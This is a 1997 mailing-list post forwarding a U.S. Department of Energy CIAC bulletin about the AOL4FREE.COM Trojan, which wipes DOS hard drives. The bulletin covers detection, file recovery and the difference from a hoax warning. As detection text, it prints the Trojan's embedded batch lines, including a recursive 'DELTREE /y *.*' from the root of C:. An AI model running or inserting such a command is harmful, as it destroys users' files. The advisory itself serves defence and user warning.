Folks, I always get a little "antsy" when posts like this come across. The following is a post I received in response to a question re: the "AOL4FREE.COM" file posted to another list. This is a long post, but _please_ take the time to read it through.

For further reading, try:

    http://ciac.llnl.gov/ciac/bulletins/h-47a.shtml   (The post below)
    http://www.kumite.com/myths                       (This topic and related, interesting reading.)

>__________________________________________________________
>>
>>                    The U.S. Department of Energy
>>                Computer Incident Advisory Capability
>>                       ___  __ __    _     ___
>>                      /       |     /_\   /
>>                      \___  __|__  /   \  \___
>>                __________________________________________________________
>>
>>                          INFORMATION BULLETIN
>>
>>              AOL4FREE.COM Trojan Horse Program Destroys Hard Drives
>>
>>April 16, 1997 18:00 GMT                                        Number H-47
>>______________________________________________________________________________
>>PROBLEM:       A Trojan Horse program called AOL4FREE.COM that deletes all
>>               files on a hard drive is circulating the Internet.
>>PLATFORM:      DOS/Windows-based PCs
>>DAMAGE:        When the AOL4FREE.COM program is executed, all files and
>>               directories on the user's C: drive are deleted.
>>SOLUTION:      DO NOT execute this program. If the program starts executing,
>>               quickly pressing Ctrl-C will save some of your files.
>>______________________________________________________________________________
>>VULNERABILITY  Users who download the trojaned AOL4FREE.COM program and
>>ASSESSMENT:    execute it will destroy all the files and directories on their
>>               DOS C: drive.
>>______________________________________________________________________________
>>
>>NOTE: THIS IS DIFFERENT FROM THE AOL4FREE HOAX MESSAGE.
>>
>>CIAC has obtained a Trojaned copy of AOL4FREE.COM that destroys hard drives.
>>
>>CIAC has obtained a Trojaned copy of the AOL4FREE.COM program that, if run,
>>deletes all the files on a user's hard drive. If you are e-mailed this file,
>>or if you have downloaded it from an online service, do not attempt to run it.
>>If the program was received as an attachment to an e-mail message, do not
>>double click (open) it. Opening an attached program runs that program, which
>>in this case deletes all the files on your hard drive. The original
>>AOL4FREE.COM was a program for fraudulently creating free AOL (America Online)
>>accounts. Note that any attempt to use the original AOL4FREE.COM program may
>>subject you to prosecution.
>>
>>NOTE: Most antivirus programs will not detect this or other Trojan Horse
>>      programs.
>>
>>Detection
>>=========
>>
>>AOL4FREE.COM is a Trojan program that is 993 bytes (2 sectors) long.
>>It masquerades as the AOL4FREE program that allows the fraudulent creation of
>>free AOL accounts. The following text is readable in the AOL4FREE.COM file
>>if you display it with the DOS TYPE command or the DOS EDIT program.
>>
>>Compiled by BAT2EXEC 1.5
>>PC Magazine . Douglas Boling
>>
>>Note that this text may appear in any program compiled with the BAT2EXEC
>>program and has nothing to do with the Trojan Horse.
>>
>>If you open the AOL4FREE.COM file with a disk editor or with the Windows
>>Notepad program, the following text is found at the end of the second sector
>>of the file.
>>
>>PATH
>>COMMANDC earc
>>/C C:
>>/C CD\
>>DELTREE /y *.*
>>ECHOOYOUR COMPUTER HAS JUST BEEN F***ED BY *VP* F*** YOU AOL-LAMER
>>
>>Where F*** is a common vulgar expletive.
>>
>>Recovery
>>========
>>
>>Pressing Ctrl-C before the Trojan Horse finishes deleting all your files will
>>save some of them. If the program runs to completion, all the files on
>>your root drive will have been deleted. The files are deleted with the
>>DOS DELTREE command, so the contents of the files are still on your hard
>>disk, only the directory entries have been deleted. Any program that can
>>recover deleted files will allow you to recover some or all of the files
>>on your hard disk.
>>
>>While attempting to recover files, be sure to not write any new files onto
>>the hard disk as the new files may overwrite the contents of a deleted file,
>>making it impossible to recover. You will probably have to boot your system
>>with a floppy and run any recovery programs from there.
>>
>>If you happen to have one of the delete tracking programs installed on your
>>system (a program that keeps track of deleted files in case you want them
>>back) the recovery operation will be relatively simple. Follow the directions
>>in your delete tracking program to recover your files. If not, you will
>>probably have to recover each file individually, supplying the first character
>>of the file name, which is overwritten in the directory when the file is
>>deleted. Most DOS/Windows disk tools programs also have the capability for
>>recovering deleted files so follow the directions included with those programs
>>to do so.
>>
>>Background
>>==========
>>
>>The original AOL4FREE.COM program was developed to fraudulently create free
>>AOL accounts. The creator of that program has pleaded guilty to defrauding
>>America Online for distributing that program. Anyone else attempting to use
>>that program to defraud AOL could also be prosecuted.
>>
>>An e-mail message was recently circulating about the Internet that warned of
>>an AOL4FREE virus, but that warning is either a hoax or a badly misunderstood
>>description of this Trojan Horse.
>>1. This program is a Trojan Horse, not a virus. It does not spread on its own.
>>2. A Trojan Horse must be run to do any damage.
>>3. Reading an e-mail message with the Trojan Horse program as an attachment
>>   will not run the Trojan Horse and will not do any damage. Note that
>>   opening an attached program from within an e-mail reader runs that
>>   attached program, which may make it appear that reading the attachment
>>   caused the damage. Users should keep in mind that any file with a .COM or
>>   .EXE extension is a program, not a document, and that double clicking or
>>   opening that program will run it.
>>
>>CIAC still affirms that reading an e-mail message, even one with an attached
>>program, can not do damage to a system. The attachment must be both downloaded
>>onto the system and run to do any damage.
>>
>>CIAC, the Computer Incident Advisory Capability, is the computer
>>security incident response team for the U.S. Department of Energy
>>(DOE) and the emergency backup response team for the National
>>Institutes of Health (NIH). CIAC is located at the Lawrence Livermore
>>National Laboratory in Livermore, California. CIAC is also a founding
>>member of FIRST, the Forum of Incident Response and Security Teams, a
>>global organization established to foster cooperation and coordination
>>among computer security teams worldwide.
>>
>>CIAC services are available to DOE, DOE contractors, and the NIH. CIAC
>>can be contacted at:
>>    Voice:    +1 510-422-8193
>>    FAX:      +1 510-423-8002
>>    STU-III:  +1 510-423-2604
>>    E-mail:   ciac@llnl.gov
>>
>>For emergencies and off-hour assistance, DOE, DOE contractor sites,
>>and the NIH may contact CIAC 24-hours a day. During off hours (5PM -
>>8AM PST), call the CIAC voice number 510-422-8193 and leave a message,
>>or call 800-759-7243 (800-SKY-PAGE) to send a Sky Page. CIAC has two
>>Sky Page PIN numbers, the primary PIN number, 8550070, is for the CIAC
>>duty person, and the secondary PIN number, 8550074 is for the CIAC
>>Project Leader.
>>
>>Previous CIAC notices, anti-virus software, and other information are
>>available from the CIAC Computer Security Archive.
>>
>>   World Wide Web:       http://ciac.llnl.gov/
>>   Anonymous FTP:        ciac.llnl.gov (128.115.19.53)
>>   Modem access:         +1 (510) 423-4753 (28.8K baud)
>>                         +1 (510) 423-3331 (28.8K baud)
>>
>>CIAC has several self-subscribing mailing lists for electronic
>>publications:
>>1. CIAC-BULLETIN for Advisories, highest priority - time critical
>>   information and Bulletins, important computer security information;
>>2. CIAC-NOTES for Notes, a collection of computer security articles;
>>3. SPI-ANNOUNCE for official news about Security Profile Inspector
>>   (SPI) software updates, new features, distribution and
>>   availability;
>>4. SPI-NOTES, for discussion of problems and solutions regarding the
>>   use of SPI products.
>>
>>Our mailing lists are managed by a public domain software package
>>called Majordomo, which ignores E-mail header subject lines. To
>>subscribe (add yourself) to one of our mailing lists, send the
>>following request as the E-mail message body, substituting
>>ciac-bulletin, ciac-notes, spi-announce OR spi-notes for list-name:
>>
>>E-mail to ciac-listproc@llnl.gov or majordomo@tholia.llnl.gov:
>>    subscribe list-name
>>    e.g., subscribe ciac-notes
>>
>>You will receive an acknowledgment email immediately with a confirmation
>>that you will need to mail back to the addresses above, as per the
>>instructions in the email. This is a partial protection to make sure
>>you are really the one who asked to be signed up for the list in question.
>>
>>If you include the word 'help' in the body of an email to the above address,
>>it will also send back an information file on how to subscribe/unsubscribe,
>>get past issues of CIAC bulletins via email, etc.
>>
>>PLEASE NOTE: Many users outside of the DOE, ESnet, and NIH computing
>>communities receive CIAC bulletins. If you are not part of these
>>communities, please contact your agency's response team to report
>>incidents. Your agency's team will coordinate with CIAC. The Forum of
>>Incident Response and Security Teams (FIRST) is a world-wide
>>organization. A list of FIRST member organizations and their
>>constituencies can be obtained via WWW at http://www.first.org/.
>>
>>This document was prepared as an account of work sponsored by an
>>agency of the United States Government. Neither the United States
>>Government nor the University of California nor any of their
>>employees, makes any warranty, express or implied, or assumes any
>>legal liability or responsibility for the accuracy, completeness, or
>>usefulness of any information, apparatus, product, or process
>>disclosed, or represents that its use would not infringe privately
>>owned rights. Reference herein to any specific commercial products,
>>process, or service by trade name, trademark, manufacturer, or
>>otherwise, does not necessarily constitute or imply its endorsement,
>>recommendation or favoring by the United States Government or the
>>University of California. The views and opinions of authors expressed
>>herein do not necessarily state or reflect those of the United States
>>Government or the University of California, and shall not be used for
>>advertising or product endorsement purposes.
>>

If you're still with me, thanks for taking the time.

Best to all, with hopes for virus-free, politically correct computing.

Horace

Horace Greeley                         hgreeley@leland.stanford.edu
"The defining statistic of death is that it has a one to one ratio."
                                                - George Bernard Shaw
LiNCS                                  voice: 415/725-4627
Stanford University                    fax:   415/725-9942